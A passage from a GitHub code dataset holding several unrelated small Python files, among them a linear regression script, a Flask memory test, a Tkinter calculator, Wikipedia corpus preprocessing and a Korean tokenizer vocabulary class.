model\nregressor = LinearRegression()\n\n## Fit with the training data\nregressor.fit(X_train, y_train)\n\n## Predict Results\ny_pred = regressor.predict(X_test)\nprint(y_pred)\n\n## Prints the coefficient\nprint(regressor.coef_)\n\n## Prints the Y intercept\nprint(regressor.intercept_)\n\n## Evaluate the model\nprint(r2_score(y_test, y_pred))\n\n## Closer to 1 = better model, this model has a r2 score of .91 so it is accurate\n","repo_name":"kaydenfriese/Machine-Learning-Algorithms","sub_path":"LinearRegression/LinearReg.py","file_name":"LinearReg.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30132297928","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\n\n\"\"\" Параметры танцевальных стилей\n\"\"\"\nDANCE_CONFIG = {\n 'Hip-hop': {\n 'body': 'покачивает телом вперёд и назад',\n 'head': 'головой вперёд-назад',\n 'legs': 'ноги в полу-присяде',\n 'hands': 'руки согнуты в локтях',\n },\n 'Electrohouse': {\n 'body': 'покачивает туловищем вперёд-назад',\n 'head': 'почти не двигает головой',\n 'legs': 'двигает ногами в ритме',\n 'hands': 'вращает руками по кругу',\n },\n 'Pop': {\n 'body': 'плавно двигает туловищем',\n 'head': 'плавно двигает туловищем головой',\n 'legs': 'плавно двигает руками',\n 'hands': 'плавно двигает ногами',\n },\n}\n\n\"\"\" Параметры музыкальных стилей\n\"\"\"\nSTYLE_CONFIG = {\n 'RnB': [\n 'Hip-hop', 'RnB',\n ],\n 'Electrohouse': [\n 'Electrodance', 'House', 'Electrohouse',\n ],\n 'Pop': [\n 'Pop',\n ]\n}\n\n\n\"\"\" Параметры танцоров (возможные имена)\n\"\"\"\nNAMES_MALE = [\n 'Вася', 'Витя', 'Никита', 'Саша', 'Петя', 'Ваня', 'Олег', 'Дима',\n]\n\nNAMES_FEMALE = [\n 'Оля', 'Надя', 'Вера', 'Люба', 'Женя', 'Лена', 'Маша', 'Евлампия',\n]\n\nFEMALE, MALE = range(0, 2)\nNAMES = {\n FEMALE: NAMES_FEMALE, MALE: NAMES_MALE\n}\n","repo_name":"Tkretts/night_club","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21680605573","text":"from __future__ import with_statement\n\nimport gc\nimport sys\nimport flask\nimport threading\nimport unittest\nfrom werkzeug.test import run_wsgi_app, create_environ\nfrom flask.testsuite import FlaskTestCase\n\n\n_gc_lock = threading.Lock()\n\n\nclass _NoLeakAsserter(object):\n\n def __init__(self, testcase):\n self.testcase = testcase\n\n def __enter__(self):\n gc.disable()\n _gc_lock.acquire()\n loc = flask._request_ctx_stack._local\n\n # Force Python to track this dictionary at all times.\n # This is necessary since Python only starts tracking\n # dicts if they contain mutable objects. 
It's a horrible,\n # horrible hack but makes this kinda testable.\n loc.__storage__['FOOO'] = [1, 2, 3]\n\n gc.collect()\n self.old_objects = len(gc.get_objects())\n\n def __exit__(self, exc_type, exc_value, tb):\n if not hasattr(sys, 'getrefcount'):\n gc.collect()\n new_objects = len(gc.get_objects())\n if new_objects > self.old_objects:\n self.testcase.fail('Example code leaked')\n _gc_lock.release()\n gc.enable()\n\n\nclass MemoryTestCase(FlaskTestCase):\n\n def assert_no_leak(self):\n return _NoLeakAsserter(self)\n\n def test_memory_consumption(self):\n app = flask.Flask(__name__)\n @app.route('/')\n def index():\n return flask.render_template('simple_template.html', whiskey=42)\n\n def fire():\n with app.test_client() as c:\n rv = c.get('/')\n self.assert_equal(rv.status_code, 200)\n self.assert_equal(rv.data, '
<h1>42</h1>')\n\n        # Trigger caches\n        fire()\n\n        # This test only works on CPython 2.7.\n        if sys.version_info >= (2, 7) and \\\n                not hasattr(sys, 'pypy_translation_info'):\n            with self.assert_no_leak():\n                for x in xrange(10):\n                    fire()\n\n\ndef suite():\n    suite = unittest.TestSuite()\n    suite.addTest(unittest.makeSuite(MemoryTestCase))\n    return suite\n","repo_name":"deepgully/me","sub_path":"libs/flask/testsuite/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"72"} +{"seq_id":"3236297774","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'robert'\n\nimport sys\nimport os\nimport logging\nlogger = logging.getLogger('weizoom-merge')\n\nfrom prunt.decorator import register_task\nfrom prunt.util import template_util\nimport prunt\n\n@register_task('weizoom-merge')\ndef weizoomMerge(prunt):\n\tu\"\"\"\n\t将js, css文件进行concat和uglify操作\n\t\"\"\"\n\tprunt.config.require('files')\n\tfiles = prunt.config['files']\n\tpaths = files['src'] if type(files['src']) == list else [files['src']]\n\n\tprunt.config.require('dest')\n\tdest = prunt.config['dest']\n\n\tpath_map = prunt.config.get('path_map', None)\n\n\tlogger.info('merge %s', paths)\n\n\tprunt.run_task('prunt-concat', {\n\t\t\"files\": {\n\t\t\t\"src\": paths,\n\t\t\t\"dest\": dest\n\t\t},\n\t\t\"comment\": \"/* comment */\",\n\t\t\"path_map\": path_map\n\t})\n\n\tsrc = dest\n\tprunt.run_task('prunt-md5', {\n\t\t\"files\": {\n\t\t\t\"src\": src\n\t\t}\n\t})\n\n\tsrc = prunt.get_last_result()\n\tprunt.run_task('prunt-uglify', {\n\t\t\"files\": {\n\t\t\t\"src\": src\n\t\t}\n\t})\n","repo_name":"chengdg/weizoom","sub_path":"weapp/prunt/builtin/weizoom_merge/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29203513555","text":"class Solution:\n    def removeDuplicates_my(self, nums):\n        nums_len = len(nums)\n        if nums_len <= 1: return nums_len\n        index_before = 0\n\n        for i in range(1, nums_len):\n            if nums[i] != nums[index_before]:\n                index_before+=1\n                nums[index_before] = nums[i]\n\n        return index_before+1\n    def removeDuplicates(self, nums):\n        before_num = None\n        re_len = 0\n        for num in nums:\n            if num != before_num:\n                nums[re_len] = num\n                before_num = num\n                re_len+=1\n\n        return re_len\n\nnums = [1,1,2]\n\ns = Solution()\nn = s.removeDuplicates(nums)\nprint(nums[:n])\n    ","repo_name":"huangshiyu13/AlgProblems","sub_path":"leetcode/26. Remove Duplicates from Sorted Array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32017721527","text":"import translators as ts\nimport logging\n\nfrom aiogram.types import InputFile\n\nfrom loader import dp\nfrom db.words import get_random_word, get_translation_choices\nfrom keyboards.inline import translate_choices_kb\nfrom states.user import TranslateWord\nfrom .image_word import create_new_image\n\n\nasync def translate_word(telegram_id: int) -> bool:\n    # добавить добавление текущего слова во временный список, чтобы нельзя было запустить много слов (одинаковые)\n    word: str | None = get_random_word()\n    if not word:\n        logging.error(f'Error all words translated: {word}')\n        # добавить обнуление при переводе всех слов !!!!!\n        await dp.bot.send_message(telegram_id, 'Ошибка! 
Ты перевел уже все слова!')\n return False\n else:\n translate_choices: list = get_translation_choices(word)\n if not translate_choices:\n logging.error(f'Error no translate choices: {translate_choices}, {word}')\n await dp.bot.send_message(telegram_id, 'Ошибка! Ты перевел уже все слова!')\n return False\n else:\n image: str = create_new_image(word)\n msg = await dp.bot.send_photo(telegram_id, InputFile(image),\n reply_markup=translate_choices_kb(word, translate_choices))\n cur_state = dp.current_state(chat=telegram_id, user=telegram_id)\n await cur_state.set_state(TranslateWord.active)\n await cur_state.update_data(message_id=msg.message_id)\n return True\n\n\ndef google_translate_word(word: str) -> str:\n try:\n translation: str = ts.google(word, from_language='en', to_language='ru')\n except Exception as ex:\n logging.error(f'Error google translate: {ex}')\n translation: str = 'отсутствует'\n return translation\n","repo_name":"bridges123/eng_learn_bot","sub_path":"services/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13574207278","text":"\"\"\"\n author:jjk\n datetime:2019/9/22\n coding:utf-8\n project name:Pycharm_workstation\n Program function: 中文语料处理\n\n 维基百科提供的语料是xml格式的,因此需要将其转化为txt格式。\n 由于维基百科中有很多繁体中文网页,所以也需要将这些繁体字转化为简体字。\n 另外,再用语料库训练词向量之前需要对中文句子进行分词,这里我就循规蹈矩的用很成熟的jieba分词吧(关于分词可以浏览博主博客:分词1,,分词2)\n\n\"\"\"\n\nimport jieba\nfrom gensim.corpora import WikiCorpus\n#from util.langconv import *\nfrom langconv import *\n\n\ndef my_function():\n space = ' '\n i = 0\n l = []\n zhwiki_name = './yuliao/zhwiki-latest-pages-articles.xml.bz2'.encode('utf-8')# 中文语料\n f = open('./yuliao/reduce_zhiwiki.txt','w',encoding='utf-8') # 创建文件reduce_zhiwiki用来将原始语料xml格式转化为txt格式\n wiki = WikiCorpus(zhwiki_name,lemmatize=False,dictionary={})\n for text in wiki.get_texts():\n for temp_sentence in text:\n # zh-hans:将繁体转换成简体\n # zh-hant:将简体转换成繁体\n temp_sentence = Converter('zh-hans').convert(temp_sentence) # 每行转换成简体\n #temp_sentence.enconde('utf-8')\n seg_list = list(jieba.cut(temp_sentence)) # 转换过来的每行简体-然后结巴分词\n for temp_term in seg_list:\n temp_term.encode('utf-8')\n l.append(temp_term) # 结巴分词完毕之后添加到l中\n\n f.write(space.join(l) + '\\n')\n l = []\n i = i+1\n if (i % 200 ==0):\n print('Saved' + str(i) + 'articles')\n f.close() # 关闭文件指针\n\nif __name__ == '__main__':\n my_function()","repo_name":"jiajikang-nlp/NLP-related-algorithm-learning","sub_path":"[3]NLP related algorithm learning/word2vec/data_pre_process.py","file_name":"data_pre_process.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"83741519","text":"import pytest\n\nimport yatest.common\nimport yt.wrapper as yt\n\nfrom crypta.lib.python import yaml_config\nfrom crypta.lib.python.yt.test_helpers import (\n tables,\n tests\n)\n\n\n@pytest.fixture(scope=\"function\")\ndef config(yt_stuff):\n return {\n \"yt-proxy\": yt_stuff.get_server(),\n \"yt-pool\": \"crypta_adobe\",\n\n \"typed-yandexuid-bindings-dir\": \"//adobe/typed_yandexuid_bindings\",\n \"all-types-yandexuid-bindings-table\": \"//adobe/all_types_yandexuid_bindings\"\n }\n\n\ndef get_input_table_test(config, name):\n on_write = tables.OnWrite(sort_by=\"yandexuid\")\n return tables.YsonTable(name, yt.ypath_join(config[\"typed-yandexuid-bindings-dir\"], name), on_write=on_write), tests.Exists()\n\n\ndef 
test_merge_yandexuid_bindings_multiple_tables(yt_stuff, config):\n config_path = yaml_config.dump(config)\n\n return tests.yt_test(\n yt_client=yt_stuff.get_yt_client(),\n binary=yatest.common.binary_path(\"crypta/dmp/adobe/bin/merge_yandexuid_bindings/bin/crypta-adobe-merge-yandexuid-bindings\"),\n args=[\"--config\", config_path],\n data_path=yatest.common.test_source_path(\"data\"),\n input_tables=[\n get_input_table_test(config, \"yandexuid_bindings__type_1\"),\n get_input_table_test(config, \"yandexuid_bindings__type_2\")\n ],\n output_tables=[\n (tables.YsonTable(\"dst_table\", config[\"all-types-yandexuid-bindings-table\"], yson_format=\"pretty\"), tests.Diff())\n ]\n )\n\n\ndef test_merge_yandexuid_bindings_one_table(yt_stuff, config):\n config_path = yaml_config.dump(config)\n\n return tests.yt_test(\n yt_client=yt_stuff.get_yt_client(),\n binary=yatest.common.binary_path(\"crypta/dmp/adobe/bin/merge_yandexuid_bindings/bin/crypta-adobe-merge-yandexuid-bindings\"),\n args=[\"--config\", config_path],\n data_path=yatest.common.test_source_path(\"data\"),\n input_tables=[\n get_input_table_test(config, \"yandexuid_bindings__type_1\")\n ],\n output_tables=[\n (tables.YsonTable(\"dst_table\", config[\"all-types-yandexuid-bindings-table\"], yson_format=\"pretty\"), tests.Diff())\n ]\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/main (10).py","file_name":"main (10).py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5025223184","text":"#!/usr/bin/env python\n\nimport csv\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n parser = argparse.ArgumentParser(description='read result from csv')\n parser.add_argument('file_name', metavar='file_name', type=str, help='input file name')\n args = parser.parse_args()\n print(args.file_name)\n\n results = np.loadtxt(args.file_name, delimiter=',')\n print(results)\n\n print(\"ave. traveled distance: \" + str(results[:, 0].mean()) + \"[m]\")\n print(\"ave. traveled time: \" + str(results[:, 1].mean()) + \"[s]\")\n print(\"ave. 
collision count: \" + str(results[:, 2].mean()))\n\n fig, ax = plt.subplots()\n bp = ax.boxplot(results)\n ax.set_xticklabels(['traveled distance', 'traveled time', 'collision count', 'min distance'])\n plt.grid()\n plt.show()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"Taka-Kazu/slp_doa","sub_path":"slp_doa/scripts/result_reader.py","file_name":"result_reader.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"27620160544","text":"from tkinter import*\r\nimport math\r\n\r\nclass Kalkulator:\r\n def __init__(self, okno):\r\n self.okno = okno\r\n self.prikazno_okno = StringVar()\r\n self.stevilo1 = ''\r\n self.stevilo2 = ''\r\n self.operator = ''\r\n self.drugi_operatorji = ''\r\n self.pripravi_graficni_vmesnik(okno)\r\n \r\n\r\n #V okno postavi gumbe\r\n def pripravi_graficni_vmesnik(self, okno):\r\n Entry(self.okno, textvariable=self.prikazno_okno, width=30).grid(columnspan=4) #Polje\r\n\r\n #Števila od 0 do 9\r\n Button(self.okno, text='1', height=1, width=5, command = lambda: self.znak('1')).grid(row=1, column=0)\r\n Button(self.okno, text='2', height=1, width=5, command = lambda: self.znak('2')).grid(row=1, column=1)\r\n Button(self.okno, text='3', height=1, width=5, command = lambda: self.znak('3')).grid(row=1, column=2)\r\n Button(self.okno, text='4', height=1, width=5, command = lambda: self.znak('4')).grid(row=2, column=0)\r\n Button(self.okno, text='5', height=1, width=5, command = lambda: self.znak('5')).grid(row=2, column=1)\r\n Button(self.okno, text='6', height=1, width=5, command = lambda: self.znak('6')).grid(row=2, column=2)\r\n Button(self.okno, text='7', height=1, width=5, command = lambda: self.znak('7')).grid(row=3, column=0)\r\n Button(self.okno, text='8', height=1, width=5, command = lambda: self.znak('8')).grid(row=3, column=1)\r\n Button(self.okno, text='9', height=1, width=5, command = lambda: self.znak('9')).grid(row=3, column=2)\r\n Button(self.okno, text='0', height=1, width=5, command = lambda: self.znak('0')).grid(row=4, column=0)\r\n\r\n Button(self.okno, text='', height=1, width=5).grid(row=4, column=1)\r\n\r\n #Operacije, ki jih racunalo zna izracunati\r\n Button(self.okno, text='+', height=1, width=5, command = lambda: self.znak('+')).grid(row=1, column=3)\r\n Button(self.okno, text='-', height=1, width=5, command = lambda: self.znak('-')).grid(row=2, column=3)\r\n Button(self.okno, text='*', height=1, width=5, command = lambda: self.znak('*')).grid(row=3, column=3)\r\n Button(self.okno, text='/', height=1, width=5, command = lambda: self.znak('/')).grid(row=4, column=3)\r\n Button(self.okno, text='^2', height=1, width=5, command = lambda: self.znak('^2')).grid(row=2, column=4)\r\n Button(self.okno, text='^1/2', height=1, width=5, command = lambda: self.znak('^1/2')).grid(row=3, column=4)\r\n Button(self.okno, text='1/[]', height=1, width=5, command = lambda: self.znak('1/')).grid(row=4, column=4)\r\n\r\n Button(self.okno, text='', height=1, width=5).grid(row=4, column=2)\r\n Button(self.okno, text='', height=1, width=5).grid(row=5, column=2)\r\n\r\n Button(self.okno, text='=', height=3, width=5, command=lambda:self.izracunati()).grid(row=4, column=2, rowspan=2)\r\n\r\n #Gumba za izbris izraza v polju\r\n Button(self.okno, text='AC', height=1, width=12, command = lambda: self.pobrisi()).grid(row=5, column=0, columnspan=2)\r\n Button(self.okno, text='C', height=1, width=12, command = lambda: self.brisi()).grid(row=5, column=3, 
columnspan=2)\r\n\r\n #Gumb za shranitev izracunanega izraza\r\n Button(self.okno, text='SHRANI', height=1, width=5, command = lambda: self.shrani_v_datoteko('shraniti.txt')).grid(row=0,column=4, columnspan=2)\r\n\r\n #Funkcija v polje vpiše izraz\r\n def znak(self, text):\r\n self.prikazno_okno.set(self.prikazno_okno.get() + text)\r\n self.prikaz_racuna(text)\r\n\r\n #Funkcija nastavi stevilo1, stevilo2 in katera operacija je med njima \r\n def prikaz_racuna(self, text):\r\n if text in '+-*/':\r\n self.operator += text\r\n if text == '^2' or text == '^1/2' or text == '1/':\r\n self.drugi_operatorji += text\r\n if len(self.operator) == 0 and len(self.drugi_operatorji) == 0:\r\n if text in '1234567890':\r\n self.stevilo1 += text\r\n if len(self.operator) == 1 or self.drugi_operatorji != '^2' or self.drugi_operatorji == '1/' or self.drugi_operatorji != '^1/2':\r\n if text in '1234567890':\r\n self.stevilo2 += text\r\n if len(self.operator) > 1 or len(self.drugi_operatorji) > 4:\r\n self.pobrisi()\r\n \r\n \r\n\r\n #Funkcija pobrise celoten izraz in ponovno nastavi racunalo\r\n def pobrisi(self):\r\n self.prikazno_okno.set('')\r\n self.ponastavi()\r\n\r\n #Funcija brise vsako stevko stevilke posebej\r\n def brisi(self):\r\n self.prikazno_okno.set(self.prikazno_okno.get()[:-1])\r\n\r\n #Funcija ponastavi vse parametre\r\n def ponastavi(self):\r\n self.operator = ''\r\n self.drugi_operatorji = ''\r\n self.stevilo1 = ''\r\n self.stevilo2 = ''\r\n\r\n #Funkcija izračuna izraz in ga izpiše v polju\r\n def izracunati(self):\r\n stevilo1 = int(self.stevilo1)\r\n dolzina=len(self.stevilo1)\r\n stevilo2 = int(self.stevilo2[dolzina:])\r\n if self.operator == '+':\r\n self.prikazno_okno.set(stevilo1 + stevilo2)\r\n self.ponastavi()\r\n if self.operator == '-':\r\n self.prikazno_okno.set(stevilo1 - stevilo2)\r\n self.ponastavi()\r\n if self.operator == '*':\r\n self.prikazno_okno.set(stevilo1 * stevilo2)\r\n self.ponastavi()\r\n if self.operator == '/':\r\n self.prikazno_okno.set(stevilo1 / stevilo2)\r\n self.ponastavi()\r\n if self.drugi_operatorji == '^1/2':\r\n self.prikazno_okno.set(math.sqrt(stevilo1))\r\n self.ponastavi()\r\n if self.drugi_operatorji == '^2':\r\n self.prikazno_okno.set(stevilo1 ** 2)\r\n self.ponastavi()\r\n if self.drugi_operatorji == '1/':\r\n self.prikazno_okno.set(1 / stevilo1)\r\n self.ponastavi()\r\n\r\n #Funkcija izracuna izraz, ne zna računati, če je več operatorjev hkrati\r\n def rezultat(self):\r\n if self.operator == '+':\r\n return(int(self.stevilo1) + int(self.stevilo2))\r\n if self.operator == '-':\r\n return(int(self.stevilo1) - int(self.stevilo2))\r\n if self.operator == '*':\r\n return(int(self.stevilo1) * int(self.stevilo2))\r\n if self.operator == '/':\r\n return(int(self.stevilo1) / int(self.stevilo2))\r\n if self.drugi_operatorji == '^1/2':\r\n return(math.sqrt(int(self.stevilo1)))\r\n if self.drugi_operatorji == '^2':\r\n return(int(self.stevilo1) ** 2)\r\n if self.drugi_operatorji == '1/':\r\n return(1 / int(self.stevilo1))\r\n\r\n #Funkcija shrani seloten izraz skupaj z rezultatom\r\n def shrani_v_datoteko(self, shrani_rezultate):\r\n with open(shrani_rezultate, 'a') as dat:\r\n if self.operator == '+' or self.operator == '-' or self.operator == '*' or self.operator == '/':\r\n print(self.stevilo1, self.operator, self.stevilo2, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji == '^':\r\n print(self.stevilo1, self.drugi_operatorji, self.stevilo2, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji in '^1/2':\r\n 
print(self.stevilo1, self.drugi_operatorji, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji in '^2':\r\n print(self.stevilo1, self.drugi_operatorji, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji in '1/':\r\n print(self.drugi_operatorji, self.stevilo2, '=', self.rezultat(), end='\\n', file=dat)\r\n if self.drugi_operatorji == '':\r\n print(self.stevilo1, end='\\n', file=dat)\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\nokno = Tk() \r\nmoj_program = Kalkulator(okno) \r\nokno.mainloop() \r\n","repo_name":"SashaOslaj/Kalkulator","sub_path":"kalkulator.py","file_name":"kalkulator.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74322707111","text":"import sys\nsys.path.append('../')\nimport configparser\nimport os\nimport networkx as nx\nimport pandas as pd\nimport multiprocessing as mp\nfrom functools import partial\nimport influence.power_influence as power\n\n\nif __name__ == \"__main__\":\n\n cf = configparser.ConfigParser()\n cf.read(\"file_path.properties\")\n path = dict(cf.items(\"file_path\"))\n directory = path['dartmouth']\n directory = directory+\"graphs/\"\n\n H = nx.read_gml(directory+\"inf_dartmouth_02-11-03.gml\")\n print(\"computing support power\")\n support = power.power_support_influence(H)\n file_name = \"support_dartmouth_02-11-03.gml\"\n print('saving graph %s' % file_name)\n nx.write_gml(support, directory + file_name)\n print(\"computing attract power\")\n attract = power.power_attract_influence(H)\n file_name = \"attract_dartmouth_02-11-03.gml\"\n print('saving graph %s' % file_name)\n nx.write_gml(attract, directory + file_name)\n file_name = \"dartmouth_02-11-03.csv\"","repo_name":"lucasant10/influence","sub_path":"dartmouth/dartmouth_power.py","file_name":"dartmouth_power.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22687270828","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom tensorflow import keras\nimport numpy as np\nfrom konlpy.tag import Twitter\nfrom collections import Counter\nfrom threading import Thread\n\n\nclass Vocabulary(object):\n \"\"\"Vocab Class\"\"\"\n\n def __init__(self, token_to_idx=None):\n\n self.token_to_idx = {}\n self.idx_to_token = {}\n self.idx = 0\n\n self.PAD = self.padding_token = \"[PAD]\"\n self.START_TOKEN = \"\"\n self.END_TOKEN = \"\"\n self.UNK = \"[UNK]\"\n self.CLS = \"[CLS]\"\n self.MASK = \"[MASK]\"\n self.SEP = \"[SEP]\"\n self.SEG_A = \"[SEG_A]\"\n self.SEG_B = \"[SEG_B]\"\n self.NUM = \"\"\n\n self.cls_token = self.CLS\n self.sep_token = self.SEP\n\n self.special_tokens = [self.PAD,\n self.START_TOKEN,\n self.END_TOKEN,\n self.UNK,\n self.CLS,\n self.MASK,\n self.SEP,\n self.SEG_A,\n self.SEG_B,\n self.NUM]\n self.init_vocab()\n\n if token_to_idx is not None:\n self.token_to_idx = token_to_idx\n self.idx_to_token = {v: k for k, v in token_to_idx.items()}\n self.idx = len(token_to_idx) - 1\n\n # if pad token in token_to_idx dict, get pad_id\n if self.PAD in self.token_to_idx:\n self.PAD_ID = self.transform_token2idx(self.PAD)\n else:\n self.PAD_ID = 0\n\n def init_vocab(self):\n for special_token in self.special_tokens:\n self.add_token(special_token)\n self.PAD_ID = self.transform_token2idx(self.PAD)\n\n def __len__(self):\n return len(self.token_to_idx)\n\n def to_indices(self, tokens):\n return 
[self.transform_token2idx(X_token) for X_token in tokens]\n\n def add_token(self, token):\n if not token in self.token_to_idx:\n self.token_to_idx[token] = self.idx\n self.idx_to_token[self.idx] = token\n self.idx += 1\n\n def transform_token2idx(self, token, show_oov=False):\n try:\n return self.token_to_idx[token]\n except:\n if show_oov is True:\n print(\"key error: \" + str(token))\n token = self.UNK\n return self.token_to_idx[token]\n\n def transform_idx2token(self, idx):\n try:\n return self.idx_to_token[idx]\n except:\n print(\"key error: \" + str(idx))\n idx = self.token_to_idx[self.UNK]\n return self.idx_to_token[idx]\n\n def build_vocab(self, list_of_str, threshold=1, vocab_save_path=\"./data_in/token_vocab.json\",\n split_fn=Twitter().morphs):\n \"\"\"Build a token vocab\"\"\"\n\n def do_concurrent_tagging(start, end, text_list, counter):\n for i, text in enumerate(text_list[start:end]):\n text = text.strip()\n text = text.lower()\n\n try:\n tokens_ko = split_fn(text)\n # tokens_ko = [str(pos[0]) + '/' + str(pos[1]) for pos in tokens_ko]\n counter.update(tokens_ko)\n\n if i % 1000 == 0:\n print(\"[%d/%d (total: %d)] Tokenized input text.\" % (\n start + i, start + len(text_list[start:end]), len(text_list)))\n\n except Exception as e: # OOM, Parsing Error\n print(e)\n continue\n\n counter = Counter()\n\n num_thread = 4\n thread_list = []\n num_list_of_str = len(list_of_str)\n for i in range(num_thread):\n thread_list.append(Thread(target=do_concurrent_tagging, args=(\n int(i * num_list_of_str / num_thread), int((i + 1) * num_list_of_str / num_thread), list_of_str,\n counter)))\n\n for thread in thread_list:\n thread.start()\n\n for thread in thread_list:\n thread.join()\n\n # vocab_report\n print(counter.most_common(10)) # print most common tokens\n tokens = [token for token, cnt in counter.items() if cnt >= threshold]\n\n for i, token in enumerate(tokens):\n self.add_token(str(token))\n\n print(\"len(self.token_to_idx): \", len(self.token_to_idx))\n\n import json\n with open(vocab_save_path, 'w', encoding='utf-8') as f:\n json.dump(self.token_to_idx, f, ensure_ascii=False, indent=4)\n\n return self.token_to_idx\n\n\n\n# def keras_pad_fn(token_ids_batch, maxlen, pad_id=0, padding='post', truncating='post'):\n# padded_token_ids_batch = keras.preprocessing.sequence.pad_sequences(token_ids_batch,\n# value=pad_id, # vocab.transform_token2idx(PAD),\n# padding=padding,\n# truncating=truncating,\n# maxlen=maxlen)\n# return np.array(padded_token_ids_batch)\n\n\nclass Tokenizer:\n \"\"\" Tokenizer class\"\"\"\n\n def __init__(self, vocab, split_fn, pad_fn, maxlen):\n self._vocab = vocab\n self._split = split_fn\n self._pad = pad_fn\n self._maxlen = maxlen\n\n # def split(self, string: str) -> list[str]:\n def split(self, string):\n tokens = self._split(string)\n return tokens\n\n # def transform(self, list_of_tokens: list[str]) -> list[int]:\n def transform(self, tokens):\n indices = self._vocab.to_indices(tokens)\n pad_indices = self._pad(indices, pad_id=0, maxlen=self._maxlen) if self._pad else indices\n return pad_indices\n\n # def split_and_transform(self, string: str) -> list[int]:\n def split_and_transform(self, string):\n return self.transform(self.split(string))\n\n @property\n def vocab(self):\n return self._vocab\n\n def list_of_tokens_to_list_of_token_ids(self, X_token_batch):\n X_ids_batch = []\n for X_tokens in X_token_batch:\n X_ids_batch.append([self._vocab.transform_token2idx(X_token) for X_token in X_tokens])\n return X_ids_batch\n\n def 
list_of_string_to_list_of_tokens(self, X_str_batch):\n        X_token_batch = [self._split(X_str) for X_str in X_str_batch]\n        return X_token_batch\n\n    def list_of_string_to_list_token_ids(self, X_str_batch):\n        X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n        X_ids_batch = self.list_of_tokens_to_list_of_token_ids(X_token_batch)\n\n        return X_ids_batch\n\n    def list_of_string_to_arr_of_pad_token_ids(self, X_str_batch, add_start_end_token=False):\n        X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n        # print(\"X_token_batch: \", X_token_batch)\n        if add_start_end_token is True:\n            return self.add_start_end_token_with_pad(X_token_batch)\n        else:\n            X_ids_batch = self.list_of_tokens_to_list_of_token_ids(X_token_batch)\n            pad_X_ids_batch = self._pad(X_ids_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n\n        return pad_X_ids_batch\n\n    def list_of_tokens_to_list_of_cls_sep_token_ids(self, X_token_batch):\n        X_ids_batch = []\n        for X_tokens in X_token_batch:\n            X_tokens = [self._vocab.cls_token] + X_tokens + [self._vocab.sep_token]\n            X_ids_batch.append([self._vocab.transform_token2idx(X_token) for X_token in X_tokens])\n        return X_ids_batch\n\n    def list_of_string_to_arr_of_cls_sep_pad_token_ids(self, X_str_batch):\n        X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n        X_ids_batch = self.list_of_tokens_to_list_of_cls_sep_token_ids(X_token_batch)\n        pad_X_ids_batch = self._pad(X_ids_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n\n        return pad_X_ids_batch\n\n    def list_of_string_to_list_of_cls_sep_token_ids(self, X_str_batch):\n        X_token_batch = self.list_of_string_to_list_of_tokens(X_str_batch)\n        X_ids_batch = self.list_of_tokens_to_list_of_cls_sep_token_ids(X_token_batch)\n\n        return X_ids_batch\n\n    def add_start_end_token_with_pad(self, X_token_batch):\n        dec_input_token_batch = [[self._vocab.START_TOKEN] + X_token for X_token in X_token_batch]\n        dec_output_token_batch = [X_token + [self._vocab.END_TOKEN] for X_token in X_token_batch]\n\n        dec_input_token_batch = self.list_of_tokens_to_list_of_token_ids(dec_input_token_batch)\n        pad_dec_input_ids_batch = self._pad(dec_input_token_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n\n        dec_output_ids_batch = self.list_of_tokens_to_list_of_token_ids(dec_output_token_batch)\n        pad_dec_output_ids_batch = self._pad(dec_output_ids_batch, pad_id=self._vocab.PAD_ID, maxlen=self._maxlen)\n        return pad_dec_input_ids_batch, pad_dec_output_ids_batch\n\n    def decode_token_ids(self, token_ids_batch):\n        list_of_token_batch = []\n        for token_ids in token_ids_batch:\n            token_token = [self._vocab.transform_idx2token(token_id) for token_id in token_ids]\n            # token_token = [self._vocab[token_id] for token_id in token_ids]\n            list_of_token_batch.append(token_token)\n        return list_of_token_batch\n\n\ndef main():\n    